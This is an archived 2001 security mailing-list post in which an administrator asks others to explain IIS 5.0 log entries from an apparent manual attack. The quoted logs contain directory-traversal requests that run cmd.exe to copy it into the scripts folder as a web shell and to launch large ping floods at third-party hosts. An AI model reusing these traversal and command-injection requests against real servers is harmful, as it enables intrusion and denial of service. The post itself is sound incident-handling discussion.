Unicode Logs with Ping Activity

From: myrddin_eat_private
Date: Tue Jul 10 2001 - 09:24:50 PDT


    Would like someone to help me understand what is going on here... The 502 
    error at the end of these entries would indicate failures, wouldn't 
    they? I've been all through the logs on this box, and even though every 
    attempt to copy c:\winnt\system32\cmd.exe to c:\inetpub\scripts\shell.exe 
    shows a 502, it is there.
    
    I'm looking at the times on the log entries and guessing that this was a 
    manual attack.
    
    Also, can someone please explain what is being attempted with these pings?
    aaa.aaa.aaa.aaa
    bbb.bbb.bbb.bbb
    ccc.ccc.ccc.ccc.ccc
    ddd.ddd.ddd.ddd.ddd 
    are all unique addresses.
    
    #Software: Microsoft Internet Information Services 5.0
    #Version: 1.0
    #Date: 2001-06-19 18:44:15
    #Fields: date time c-ip cs-username s-ip s-port cs-method cs-uri-stem cs-uri-query sc-status cs(User-Agent)
    2001-06-19 18:44:15 aaa.aaa.aaa.aaa - bbb.bbb.bbb.bbb 80 GET /scripts/../../winnt/system32/cmd.exe /c+copy+c:\winnt\system32\cmd.exe+c:\inetpub\scripts\shell.exe 502 -
    2001-06-19 19:24:28 aaa.aaa.aaa.aaa - bbb.bbb.bbb.bbb 80 GET /scripts/../../winnt/system32/cmd.exe /c+ping+-v+ip-header-bad%20-n+300+-l+65500+-w+0+ccc.ccc.ccc.ccc 502 -
    2001-06-19 19:31:42 aaa.aaa.aaa.aaa - bbb.bbb.bbb.bbb 80 GET /scripts/../../winnt/system32/cmd.exe /c+ping+-v+host-precedence-violation%20-n+300+-l+65500+-w+0+ddd.ddd.ddd.ddd 502 -
    
    
    
    ----------------------------------------------------------------------------
    
    
    This list is provided by the SecurityFocus ARIS analyzer service.
    For more information on this free incident handling, management 
    and tracking system please see:
    
    http://aris.securityfocus.com
    
    
    



    This archive was generated by hypermail 2b30 : Tue Jul 10 2001 - 09:39:22 PDT